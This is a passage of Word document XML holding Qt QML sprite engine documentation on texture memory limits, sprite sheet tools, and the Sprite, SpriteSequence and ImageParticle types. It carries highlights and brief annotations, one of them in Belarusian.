        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00472CF6">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sprite engine internally copies and cuts up images to fit in an easier to read internal format</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, which </w:t>
      </w:r>
      <w:r w:rsidRPr="00472CF6">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>leads to some graphics memory limitations.</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Because it requires all the sprites for a single engine to be in the same texture, </w:t>
      </w:r>
      <w:r w:rsidRPr="00472CF6">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attempting to load many different animations can run into texture memory limits on embedded devices</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. In these situations, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00472CF6">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>warning will be output to the console containing the maximum texture size</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00472CF6">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D127FB" w:rsidRPr="008D4C56">
        <w:rPr>
          <w:i/>
          <w:color w:val="262626"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00472CF6" w:rsidRPr="008D4C56">
        <w:rPr>
          <w:i/>
          <w:color w:val="262626"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Realization</w:t>
      </w:r>
      <w:r w:rsidR="00D127FB" w:rsidRPr="008D4C56">
        <w:rPr>
          <w:i/>
          <w:color w:val="262626"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> details and potential problems //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00472CF6">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>There are several tools to help turn a set of images into sprite sheets</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, here are some examples:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00472CF6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Photoshop plugin</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2521" w:history="1">
        <w:r w:rsidRPr="00441D0A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://www.johnwordsworth.com/projects/photoshop-sprite-sheet-generator-script</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00472CF6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Gimp plugin</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2522" w:history="1">
        <w:r w:rsidRPr="00441D0A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://registry.gimp.org/node/20943</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="81"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00472CF6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cmd-line tool</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2523" w:history="1">
        <w:r w:rsidRPr="00441D0A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://www.imagemagick.org/script/montage.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00D127FB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2168" w:name="qml-types-using-the-sprite-engine"/>
      <w:bookmarkStart w:id="2169" w:name="_Toc483000999"/>
      <w:bookmarkStart w:id="2170" w:name="_Toc483003990"/>
      <w:bookmarkStart w:id="2171" w:name="_Toc483604340"/>
      <w:bookmarkStart w:id="2172" w:name="_Toc483605560"/>
      <w:bookmarkEnd w:id="2168"/>
      <w:r w:rsidRPr="00D127FB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML Types Using the Sprite Engine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2169"/>
      <w:bookmarkEnd w:id="2170"/>
      <w:bookmarkEnd w:id="2171"/>
      <w:bookmarkEnd w:id="2172"/>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sprites for the sprite engine can be defined using the</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2524" w:history="1">
        <w:r w:rsidRPr="00472CF6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Sprite</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type. This type includes the input parameters as well as the length of the animation and weighted transitions to other animations. It is purely a data class, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00472CF6">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>does not render anything</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00490E7E" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2525" w:anchor="spritesequence" w:history="1">
        <w:r w:rsidR="00441D0A" w:rsidRPr="00472CF6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SpriteSequence</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00472CF6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00441D0A" w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is a type which uses a sprite engine to draw the sprites defined in it. It is a single and self-contained sprite engine, and does not interact with other sprite engines.</w:t>
      </w:r>
      <w:r w:rsidR="00441D0A" w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2526" w:history="1">
        <w:r w:rsidR="00441D0A" w:rsidRPr="00472CF6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Sprite</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00441D0A" w:rsidRPr="00472CF6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00441D0A" w:rsidRPr="00472CF6">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>types can be shared between sprite engine using types</w:t>
      </w:r>
      <w:r w:rsidR="00441D0A" w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, but this is not done automatically. So if you have defined a sprite in one</w:t>
      </w:r>
      <w:r w:rsidR="00441D0A" w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2527" w:anchor="spritesequence" w:history="1">
        <w:r w:rsidR="00441D0A" w:rsidRPr="00441D0A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SpriteSequence</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00441D0A" w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00441D0A" w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">you will </w:t>
      </w:r>
      <w:r w:rsidR="00441D0A" w:rsidRPr="00472CF6">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>need to redefine it</w:t>
      </w:r>
      <w:r w:rsidR="00441D0A" w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or reference the same</w:t>
      </w:r>
      <w:r w:rsidR="00441D0A" w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2528" w:history="1">
        <w:r w:rsidR="00441D0A" w:rsidRPr="00441D0A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Sprite</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00441D0A" w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00441D0A" w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type) in the sprites property of another</w:t>
      </w:r>
      <w:r w:rsidR="00441D0A" w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2529" w:anchor="spritesequence" w:history="1">
        <w:r w:rsidR="00441D0A" w:rsidRPr="00441D0A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SpriteSequence</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00441D0A" w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00441D0A" w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in order to transition to that animation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Additionally</w:t>
      </w:r>
      <w:r w:rsidRPr="00472CF6">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00472CF6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2530" w:history="1">
        <w:r w:rsidRPr="00472CF6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ImageParticle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00472CF6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00472CF6">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can use</w:t>
      </w:r>
      <w:r w:rsidRPr="00472CF6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2531" w:history="1">
        <w:r w:rsidRPr="00472CF6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Sprite</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">types to define </w:t>
      </w:r>
      <w:r w:rsidRPr="00472CF6">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sprites for each particle</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. This is again a single sprite engine per type. This works similarly to</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2532" w:anchor="spritesequence" w:history="1">
        <w:r w:rsidRPr="00441D0A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SpriteSequence</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, but it also has the </w:t>
      </w:r>
      <w:r w:rsidRPr="00472CF6">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>parametrized variability</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided by the</w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2533" w:history="1">
        <w:r w:rsidRPr="00441D0A">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ImageParticle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00441D0A">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472CF6" w:rsidRPr="00D127FB" w:rsidRDefault="00D127FB" w:rsidP="00441D0A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00472CF6" w:rsidRPr="00472CF6">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">У мяне ўсё атрымалася з тыпам: </w:t>
      </w:r>
      <w:r w:rsidR="00472CF6" w:rsidRPr="00472CF6">
        <w:rPr>
          <w:color w:val="800080"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AnimatedSprite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="800080"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00441D0A" w:rsidRPr="00441D0A" w:rsidRDefault="00441D0A" w:rsidP="00D127FB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2173" w:name="animatedsprite-type"/>
      <w:bookmarkStart w:id="2174" w:name="_Toc483001000"/>
      <w:bookmarkStart w:id="2175" w:name="_Toc483003991"/>
      <w:bookmarkStart w:id="2176" w:name="_Toc483604341"/>
